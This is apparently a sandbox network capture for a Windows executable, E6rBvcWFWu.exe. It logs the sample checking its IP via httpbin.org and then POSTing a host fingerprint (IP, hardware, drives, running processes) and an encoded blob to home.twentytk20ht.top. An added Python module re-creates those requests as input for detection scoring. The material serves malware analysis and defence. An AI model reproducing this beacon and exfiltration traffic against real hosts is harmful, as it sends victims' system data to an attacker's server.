Dec 26, 2024 13:02:31.737637997 CET | 49739 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:31.857394934 CET | 80 | 49739 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:33.275327921 CET | 80 | 49739 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:33.275803089 CET | 80 | 49739 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:33.275851965 CET | 49739 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:33.283987045 CET | 49739 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:33.403445005 CET | 80 | 49739 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:33.661511898 CET | 49744 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:33.781135082 CET | 80 | 49744 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:33.781263113 CET | 49744 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:33.781743050 CET | 49744 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:33.901285887 CET | 80 | 49744 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:35.403192043 CET | 80 | 49744 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:35.403337955 CET | 80 | 49744 | 185.121.15.192 | 192.168.2.9
Dec 26, 2024 13:02:35.403454065 CET | 49744 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:35.403976917 CET | 49744 | 80 | 192.168.2.9 | 185.121.15.192
Dec 26, 2024 13:02:35.523394108 CET | 80 | 49744 | 185.121.15.192 | 192.168.2.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 26, 2024 13:02:21.939748049 CET | 62162 | 53 | 192.168.2.9 | 1.1.1.1
Dec 26, 2024 13:02:21.939861059 CET | 62162 | 53 | 192.168.2.9 | 1.1.1.1
Dec 26, 2024 13:02:22.077548981 CET | 53 | 62162 | 1.1.1.1 | 192.168.2.9
Dec 26, 2024 13:02:22.226948977 CET | 53 | 62162 | 1.1.1.1 | 192.168.2.9
Dec 26, 2024 13:02:26.121300936 CET | 62165 | 53 | 192.168.2.9 | 1.1.1.1
Dec 26, 2024 13:02:26.121354103 CET | 62165 | 53 | 192.168.2.9 | 1.1.1.1
Dec 26, 2024 13:02:26.818516970 CET | 53 | 62165 | 1.1.1.1 | 192.168.2.9
Dec 26, 2024 13:02:26.841677904 CET | 53 | 62165 | 1.1.1.1 | 192.168.2.9
Dec 26, 2024 13:02:31.475119114 CET | 62167 | 53 | 192.168.2.9 | 1.1.1.1
Dec 26, 2024 13:02:31.475263119 CET | 62167 | 53 | 192.168.2.9 | 1.1.1.1
Dec 26, 2024 13:02:31.614885092 CET | 53 | 62167 | 1.1.1.1 | 192.168.2.9
Dec 26, 2024 13:02:31.614898920 CET | 53 | 62167 | 1.1.1.1 | 192.168.2.9
Dec 26, 2024 13:02:33.522707939 CET | 62169 | 53 | 192.168.2.9 | 1.1.1.1
Dec 26, 2024 13:02:33.522937059 CET | 62169 | 53 | 192.168.2.9 | 1.1.1.1
Dec 26, 2024 13:02:33.660115004 CET | 53 | 62169 | 1.1.1.1 | 192.168.2.9
Dec 26, 2024 13:02:33.660346985 CET | 53 | 62169 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 26, 2024 13:02:21.939748049 CET | 192.168.2.9 | 1.1.1.1 | 0x2dc5 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:02:21.939861059 CET | 192.168.2.9 | 1.1.1.1 | 0xe8b | Standard query (0) | httpbin.org | 28 (AAAA) | IN (0x0001) | false
Dec 26, 2024 13:02:26.121300936 CET | 192.168.2.9 | 1.1.1.1 | 0x424a | Standard query (0) | home.twentytk20ht.top | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:02:26.121354103 CET | 192.168.2.9 | 1.1.1.1 | 0xa3d8 | Standard query (0) | home.twentytk20ht.top | 28 (AAAA) | IN (0x0001) | false
Dec 26, 2024 13:02:31.475119114 CET | 192.168.2.9 | 1.1.1.1 | 0x44b4 | Standard query (0) | home.twentytk20ht.top | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:02:31.475263119 CET | 192.168.2.9 | 1.1.1.1 | 0x5abc | Standard query (0) | home.twentytk20ht.top | 28 (AAAA) | IN (0x0001) | false
Dec 26, 2024 13:02:33.522707939 CET | 192.168.2.9 | 1.1.1.1 | 0xe5f0 | Standard query (0) | home.twentytk20ht.top | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:02:33.522937059 CET | 192.168.2.9 | 1.1.1.1 | 0xbc68 | Standard query (0) | home.twentytk20ht.top | 28 (AAAA) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 26, 2024 13:02:14.479337931 CET | 1.1.1.1 | 192.168.2.9 | 0xcd75 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
Dec 26, 2024 13:02:14.479337931 CET | 1.1.1.1 | 192.168.2.9 | 0xcd75 | No error (0) | s-part-0035.t-0009.t-msedge.net | - | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:02:22.226948977 CET | 1.1.1.1 | 192.168.2.9 | 0x2dc5 | No error (0) | httpbin.org | - | 3.218.7.103 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:02:22.226948977 CET | 1.1.1.1 | 192.168.2.9 | 0x2dc5 | No error (0) | httpbin.org | - | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:02:26.818516970 CET | 1.1.1.1 | 192.168.2.9 | 0x424a | No error (0) | home.twentytk20ht.top | - | 185.121.15.192 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:02:31.614885092 CET | 1.1.1.1 | 192.168.2.9 | 0x44b4 | No error (0) | home.twentytk20ht.top | - | 185.121.15.192 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:02:33.660115004 CET | 1.1.1.1 | 192.168.2.9 | 0xe5f0 | No error (0) | home.twentytk20ht.top | - | 185.121.15.192 | A (IP address) | IN (0x0001) | false
                                  • httpbin.org
                                  • home.twentytk20ht.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49730 | 185.121.15.192 | 80 | 7576 | C:\Users\user\Desktop\E6rBvcWFWu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 13:02:26.964468002 CET | 12360 | OUT | POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
Host: home.twentytk20ht.top
Accept: */*
Content-Type: application/json
Content-Length: 501311
                                  Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 35 32 31 34 35 34 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                  Data Ascii: { "ip": "8.46.123.189", "current_time": "1735214544", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 584 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 880 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 792 }, { "name": "svchost.exe", "pid": [TRUNCATED]
Dec 26, 2024 13:02:27.084285021 CET | 4944 | OUT | Data Raw: 2f 74 65 4b 4f 48 63 6b 6f 59 6a 6e 72 70 30 5c 2f 5a 34 57 70 58 71 77 2b 4b 64 4f 4d 50 65 50 79 44 78 65 2b 6a 4c 34 33 2b 41 32 58 35 50 6d 76 69 76 77 54 5c 2f 71 72 67 4d 2b 78 74 66 4c 73 70 78 48 2b 73 6e 43 4f 65 66 57 38 5a 68 71 43 78
                                  Data Ascii: /teKOHckoYjnrp0\/Z4WpXqw+KdOMPePyDxe+jL43+A2X5PmvivwT\/qrgM+xtfLspxH+snCOefW8ZhqCxNej7PhvPs4rUOShJT58TTo0pfDCcppxODop7LjkdP5Uyv6IPwcKKKKDSn1+X6kLx8h\/f\/P6\/wCfRtWK\/YP\/AIJjfsS\/BD9rXwf8VtT+LEXiwX3gnxH4bsNIn8L+IV0YyWmt6bqVxcRX0c9hqUM3kzaYjWzx
Dec 26, 2024 13:02:27.084424973 CET | 2472 | OUT | Data Raw: 6d 7a 35 33 4d 51 69 5c 2f 65 53 5c 2f 76 38 41 5c 2f 54 42 36 66 35 39 41 4b 44 39 33 37 38 62 70 5c 2f 77 41 74 66 4c 6c 38 6a 50 66 74 6e 38 78 36 66 53 67 41 6b 2b 58 37 36 62 5c 2f 2b 32 76 4a 5c 2f 7a 7a 56 61 4f 54 79 39 5c 2f 77 43 2b 33
                                  Data Ascii: mz53MQi\/eS\/v8A\/TB6f59AKD9378bp\/wAtfLl8jPftn8x6fSgAk+X76b\/+2vJ\/zzVaOTy9\/wC+3\/T9xB7\/AOTx9astsb\/Yf\/lrx+WT9P8A6\/eov9Xv2PJ5P\/kD\/P0NB0EfmF9iPx6+X\/jz\/nmhw\/pH1\/1jyjyPp64p7Ru+xH+\/5v7q5\/1H+ffP\/wBeom+86O\/\/AG0\/CgCBYz\/ATvEZPmSf+2lp
Dec 26, 2024 13:02:27.084518909 CET | 4944 | OUT | Data Raw: 76 43 79 7a 51 58 75 72 74 45 38 4c 61 68 64 53 61 62 6f 45 46 31 5a 58 47 72 78 33 39 70 37 62 2b 79 42 5c 2f 77 55 5a 2b 46 58 37 51 50 37 4b 6d 75 5c 2f 48 6e 78 7a 72 57 6b 65 43 64 63 2b 44 2b 68 73 66 6a 35 6f 2b 39 5c 2f 4c 38 4f 61 6c 59
                                  Data Ascii: vCyzQXurtE8LahdSaboEF1ZXGrx39p7b+yB\/wUZ+FX7QP7Kmu\/HnxzrWkeCdc+D+hsfj5o+9\/L8OalYWT3Ca3o9iWm1C60HxkkD3PhWCIXd1PqbXfhWCbUdW0qdpf8+c14Bz7C5TmPFWXeGmX4vhSlxhjOEsBj1X4rr4vFYqnjamCws1hqPEcalajWxMIZdHGUqCwtTNJfUKbjiJKiv8AVzKfEDIMXm2XcK5h4mZjheLKvB+
Dec 26, 2024 13:02:27.084542036 CET | 2472 | OUT | Data Raw: 33 65 62 4a 35 69 4a 49 6e 5c 2f 4c 58 5c 2f 56 65 66 30 78 5c 2f 50 72 5c 2f 6e 68 6e 2b 72 33 5c 2f 50 76 35 5c 2f 77 42 58 35 76 6e 77 66 35 48 59 2b 76 53 6c 32 5c 2f 76 4d 66 77 5c 2f 38 2b 5c 2f 66 5c 2f 41 44 6a 39 65 33 61 6e 4e 38 32 2b
                                  Data Ascii: 3ebJ5iJIn\/LX\/Vef0x\/Pr\/nhn+r3\/Pv5\/wBX5vnwf5HY+vSl2\/vMfw\/8+\/f\/ADj9e3anN82+F3KfZ\/3WP8\/nQdAz\/XRvv+5H+9P9P8\/nVZZfMZ\/m8tI\/+Wnm\/wCv\/wA9+eKmk8yP5P8An3xNF5fM+f8APXvTJN+53\/jyIsRzf6nn0oAZ+88yb9z8n\/LLjz4P89vf1oXZJG\/8L\/6P5X739xN+f\/L8
Dec 26, 2024 13:02:27.084629059 CET | 4944 | OUT | Data Raw: 54 71 71 55 5a 30 33 68 63 70 77 6c 62 45 77 6c 43 56 75 58 6c 78 32 4a 78 61 74 73 5c 2f 69 33 6b 78 6d 77 65 5c 2f 38 41 6e 38 4b 59 5c 2f 77 42 34 5c 2f 68 5c 2f 49 56 4e 54 4f 37 5c 2f 51 66 79 72 39 73 50 35 5c 2f 49 71 4b 4b 66 73 50 74 5c
                                  Data Ascii: TqqUZ03hcpwlbEwlCVuXlx2Jxats\/i3kxmwe\/8An8KY\/wB4\/h\/IVNTO7\/Qfyr9sP5\/IqKKfsPt\/n8KAP7XriXnr3\/r9ev69cV8oajLnxX4kP\/Uw6z+O7UbrH5H619D6R4k0TxTpOl+IvDmrafrug6xbQ3+l6tpd1DfafqFnMN0dxa3UDvFNGwyCVY4cFW2sGA\/LOx\/bZ\/Zwa4mu9Q+JpNxczyXNxI3g\/wAfO0
Dec 26, 2024 13:02:27.084677935 CET | 4944 | OUT | Data Raw: 41 4a 48 54 46 58 5c 2f 33 6b 65 7a 65 64 6a 2b 56 36 5c 2f 35 5c 2f 7a 69 6f 5a 49 55 32 76 38 6d 5c 2f 6a 5c 2f 56 2b 64 2b 5a 5c 2f 44 74 78 36 56 50 4f 5c 2f 4c 2b 76 6d 64 68 54 2b 52 74 6e 38 59 5c 2f 6e 5c 2f 58 5c 2f 4a 36 39 31 6b 5c 2f
                                  Data Ascii: AJHTFX\/3kezedj+V6\/5\/zioZIU2v8m\/j\/V+d+Z\/Dtx6VPO\/L+vmdhT+Rtn8Y\/n\/X\/J691k\/vb4\/3ko82T\/OKdnG9f+eX\/wBamY\/du+7e\/m\/p\/L\/H61qa868\/6+Yw8rvSaNP+WPl\/4f1\/pTG3+Z\/feP8A55\/5\/HvU2Mb8P\/27+Vnyf5e\/+TTJPLXZ\/rPM7xx8dP8AP\/16Cyt3KFN6Y\/1n+
Dec 26, 2024 13:02:27.204343081 CET | 2472 | OUT | Data Raw: 2f 74 58 36 68 38 43 39 48 38 53 5c 2f 45 65 7a 2b 4c 46 68 38 46 4e 64 2b 48 6d 6b 5c 2f 46 69 35 31 36 43 58 78 68 38 49 76 43 58 77 71 38 54 61 78 34 61 2b 48 4f 72 70 34 75 38 52 2b 44 5c 2f 42 48 78 53 38 55 65 4c 59 64 44 30 37 57 37 5c 2f
                                  Data Ascii: /tX6h8C9H8S\/Eez+LFh8FNd+Hmk\/Fi516CXxh8IvCXwq8Tax4a+HOrp4u8R+D\/BHxS8UeLYdD07W7\/SNF1m30XUntvscR41eGuEk44jjHLqUY4mvhHXlDHfU1WwixP17\/bVg3g\/ZZb9SxqzTEe3+r5XLB4qOYVcNLD1lD5XCfR98ZMdBzwnAWbV5rCUsa8LGtlyzCOHxMsHHAuWWSxscwjWzN5hgP7IwzwqxObrHYR5ZR
Dec 26, 2024 13:02:27.204432011 CET | 2472 | OUT | Data Raw: 74 76 66 44 64 37 34 6c 30 36 53 2b 74 76 37 4f 4e 78 66 77 56 5c 2f 47 64 78 34 63 38 47 2b 4c 4c 37 77 46 48 38 53 5c 2f 68 5a 34 31 38 65 65 46 5c 2f 46 32 6f 5c 2f 44 5c 2f 77 43 4b 48 67 58 77 4e 72 48 6a 6d 35 38 55 5c 2f 43 54 78 7a 6f 5c
                                  Data Ascii: tvfDd74l06S+tv7ONxfwV\/Gdx4c8G+LL7wFH8S\/hZ418eeF\/F2o\/D\/wCKHgXwNrHjm58U\/CTxzo\/mQ6r4Z8X\/APCXfDjwZ4Y8QS6fqlnq+iXWvfCbxR8S\/B0Wq6Ncxt4lFrqHh+71r9hyvxe8Ns6x+GyvKuLMvxuY4zGYvA4bB0aeNderXwNSlRxbUJYWLjhsPXr4fDVMbPlwaxeIoYT6w8TWpUp\/h2a+BXi3w\/l
Dec 26, 2024 13:02:27.204485893 CET | 2472 | OUT | Data Raw: 32 6e 6c 2b 50 5c 2f 41 41 43 42 2b 76 34 55 79 72 46 52 62 44 37 66 35 5c 2f 43 67 37 43 70 54 48 36 66 6a 5c 2f 51 31 50 35 54 2b 6e 36 48 5c 2f 43 6d 62 48 39 76 79 5c 2f 2b 79 6f 4e 4b 66 58 2b 76 36 5c 2f 34 59 72 55 56 4b 5c 2f 54 38 66 36
                                  Data Ascii: 2nl+P\/AACB+v4UyrFRbD7f5\/Cg7CpTH6fj\/Q1P5T+n6H\/CmbH9vy\/+yoNKfX+v6\/4YrUVK\/T8f6GoqDQifr+H9TTKkk7fj\/So6DT2nl+P\/AACOTt+P9KjqxUGx\/b8v\/sqDo9p5fj\/wCF+v4f1NQsu7+X1qw\/T8f6Gm4f3\/AD\/+vW3v\/wB38TQp7fL\/AEOf5UtSydE+h\/nUVUd3v\/3fxIZe\/wDu\/wCN
Dec 26, 2024 13:02:27.204504967 CET | 2472 | OUT | Data Raw: 7a 50 6c 66 65 2b 39 5c 2f 2b 57 4d 6a 6a 5c 2f 55 5c 2f 35 50 65 67 6c 46 5a 76 4a 38 76 38 41 36 35 79 66 38 74 68 39 66 35 31 50 69 52 66 37 38 4b 66 36 30 52 2b 62 35 5c 2f 38 41 6f 5c 2f 38 41 53 71 39 5c 2f 2b 37 2b 4a 52 42 4a 2b 38 35 5c
                                  Data Ascii: zPlfe+9\/+WMjj\/U\/5PeglFZvJ8v8A65yf8th9f51PiRf78Kf60R+b5\/8Ao\/8ASq9\/+7+JRBJ+85\/5bD7RL\/zw\/wCXr8Ov8vxFM8vLP5Pyf78vrz\/n\/Cpvk8xGT5P3f\/LT\/XxW\/P8A9f6e1QyL5rb9kb5jP7uTP+f8+1Hv\/wB38QIf+Wb\/APkTp\/26df8AP44pn8W3\/XQ+b\/zy\/wBQev8An696ueZM0j
Dec 26, 2024 13:02:31.405029058 CET | 157 | IN | HTTP/1.1 200 OK
Server: nginx/1.22.1
Date: Thu, 26 Dec 2024 12:02:31 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1
Connection: close
Data Raw: 30
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49739 | 185.121.15.192 | 80 | 7576 | C:\Users\user\Desktop\E6rBvcWFWu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 13:02:31.737637997 CET | 101 | OUT | GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=0 HTTP/1.1
Host: home.twentytk20ht.top
Accept: */*
Dec 26, 2024 13:02:33.275327921 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
Server: nginx/1.22.1
Date: Thu, 26 Dec 2024 12:02:33 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 207
Connection: close
                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49744 | 185.121.15.192 | 80 | 7576 | C:\Users\user\Desktop\E6rBvcWFWu.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 13:02:33.781743050 CET | 174 | OUT | POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1
Host: home.twentytk20ht.top
Accept: */*
Content-Type: application/json
Content-Length: 31
                                  Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                  Data Ascii: { "id1": "0", "data": "Done1" }
Dec 26, 2024 13:02:35.403192043 CET | 372 | IN | HTTP/1.1 404 NOT FOUND
Server: nginx/1.22.1
Date: Thu, 26 Dec 2024 12:02:35 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 207
Connection: close
                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                  Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49719 | 3.218.7.103 | 443 | 7576 | C:\Users\user\Desktop\E6rBvcWFWu.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 12:02:24 UTC | 52 | OUT | GET /ip HTTP/1.1
Host: httpbin.org
Accept: */*
2024-12-26 12:02:25 UTC | 224 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 12:02:24 GMT
Content-Type: application/json
Content-Length: 31
Connection: close
Server: gunicorn/19.9.0
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
2024-12-26 12:02:25 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
Data Ascii: { "origin": "8.46.123.189"}
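The three sessions to home.twentytk20ht.top and the httpbin.org check-in above are enough to write detection logic for this beacon. The Python below is an added example, not part of the Joe Sandbox report and not the sample's own code. It re-types the captured requests as constructed sample input (the 501,311-byte fingerprint body is abridged to its leading keys and three process entries), parses each request, and scores it on what the capture shows: no User-Agent header, a path built from a letter token plus a 10-digit Unix epoch, a JSON body carrying the host-fingerprint keys, and a process list. The indicator names, the five-key threshold and the path regex are assumptions chosen to fit this capture rather than a published signature; `ip_echo_matches` checks the one correlation worth recording: the `ip` the beacon reports is the egress address httpbin.org returned two seconds earlier.

```python
"""Score captured HTTP requests for the host-fingerprint beacon seen above.

Added example, not code from the Joe Sandbox report or from the sample.
Requests are re-typed from the report; the fingerprint body is abridged
(constructed) so the module runs offline.
"""
import json
import re
from datetime import datetime, timezone

# Top-level keys of the JSON fingerprint POSTed to home.twentytk20ht.top.
FINGERPRINT_KEYS = {
    "ip", "current_time", "Num_processor", "Num_ram", "drivers",
    "Num_displays", "resolution_x", "resolution_y", "recent_files", "processes",
}
# Assumed path shape: 8+ letters followed by a 10-digit Unix epoch,
# as in /TQIuuaqjNpwYjtUvFojm1734579850 (optionally with a query string).
EPOCH_PATH_RE = re.compile(r"^/[A-Za-z]{8,}1[5-9]\d{8}(?:\?.*)?$")


def http_request(method, target, host, body=None):
    """Build a raw HTTP/1.1 request with the header set the sample used: no User-Agent."""
    lines = [f"{method} {target} HTTP/1.1", f"Host: {host}", "Accept: */*"]
    if body is not None:
        lines += ["Content-Type: application/json", f"Content-Length: {len(body)}"]
    return "\r\n".join(lines) + "\r\n\r\n" + (body or "")


# Constructed sample input, in capture order (values taken from the report).
FINGERPRINT_BODY = json.dumps({
    "ip": "8.46.123.189", "current_time": "1735214544",
    "Num_processor": 4, "Num_ram": 7,
    "drivers": [{"name": "C:\\", "all": 223.0, "free": 168.0}],
    "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024,
    "recent_files": 38,
    "processes": [{"name": "[System Process]", "pid": 0},
                  {"name": "System", "pid": 4},
                  {"name": "lsass.exe", "pid": 640}],  # abridged
})
C2_HOST = "home.twentytk20ht.top"
C2_PATH = "/TQIuuaqjNpwYjtUvFojm1734579850"
SAMPLE_REQUESTS = [
    http_request("GET", "/ip", "httpbin.org"),
    http_request("POST", C2_PATH, C2_HOST, FINGERPRINT_BODY),
    http_request("GET", C2_PATH + "?argument=0", C2_HOST),
    http_request("POST", C2_PATH, C2_HOST, '{ "id1": "0", "data": "Done1" }'),
]
HTTPBIN_REPLY_BODY = '{\n  "origin": "8.46.123.189"\n}\n'


def parse_http_request(raw):
    """Split a raw request into method, target, lower-cased header map and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def epoch_to_utc(value):
    """Decode the 10-digit epoch strings the beacon embeds in its path and body."""
    return datetime.fromtimestamp(int(value), tz=timezone.utc)


def beacon_indicators(req):
    """Names of the indicators that fire on one parsed request."""
    hits = []
    if "user-agent" not in req["headers"]:
        hits.append("no_user_agent")
    if EPOCH_PATH_RE.match(req["target"]):
        hits.append("epoch_in_path")
    if req["method"] == "POST":
        try:
            doc = json.loads(req["body"])
        except ValueError:
            doc = None
        if isinstance(doc, dict):
            if len(FINGERPRINT_KEYS & set(doc)) >= 5:  # threshold is an assumption
                hits.append("host_fingerprint_json")
            procs = doc.get("processes")
            if isinstance(procs, list) and procs and all(
                    isinstance(p, dict) and {"name", "pid"} <= set(p) for p in procs):
                hits.append("process_list_exfil")
    return hits


def classify(raw):
    """Parse one request and map its indicators to a verdict."""
    req = parse_http_request(raw)
    hits = beacon_indicators(req)
    if {"host_fingerprint_json", "process_list_exfil"} & set(hits):
        verdict = "fingerprint_beacon"
    elif len(hits) >= 2:
        verdict = "suspicious"
    elif hits:
        verdict = "weak_signal"  # a missing User-Agent alone is common in CLI tools
    else:
        verdict = "clean"
    return {"host": req["headers"].get("host"), "target": req["target"],
            "indicators": hits, "verdict": verdict}


def ip_echo_matches(httpbin_body, fingerprint_body):
    """True when the 'ip' the beacon reports is the egress address httpbin.org returned."""
    return json.loads(httpbin_body)["origin"] == json.loads(fingerprint_body)["ip"]


def analyze(raws=SAMPLE_REQUESTS):
    """Classify every request in capture order."""
    return [classify(r) for r in raws]


if __name__ == "__main__":
    for r in analyze():
        print(r["verdict"], r["host"], r["target"], r["indicators"])
    print("ip echoed from httpbin:", ip_echo_matches(HTTPBIN_REPLY_BODY, FINGERPRINT_BODY))
    print("current_time ->", epoch_to_utc("1735214544").isoformat())
```

Run stand-alone, the module prints one verdict per request: the httpbin.org call scores only the missing User-Agent (a weak signal by itself, since plenty of legitimate CLI tools omit it too), the first POST to home.twentytk20ht.top is the fingerprint beacon, and the follow-up GET with `?argument=0` and the `Done1` POST score as suspicious on path shape alone. `epoch_to_utc("1735214544")` gives 2024-12-26 12:02:24 UTC, which is the capture time, so `current_time` is the moment the beacon was sent; the 1734579850 suffix in the path is identical across all three requests, so it is not a per-request timestamp and can be carried as an IOC for this build together with the host name.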


Target ID: 0
Start time: 07:02:19
Start date: 26/12/2024
Path: C:\Users\user\Desktop\E6rBvcWFWu.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\E6rBvcWFWu.exe"
Imagebase: 0x670000
File size: 4'478'464 bytes
MD5 hash: B6BF5FB735BF9B5B70A90D2C7EEB2996
Has elevated privileges: true
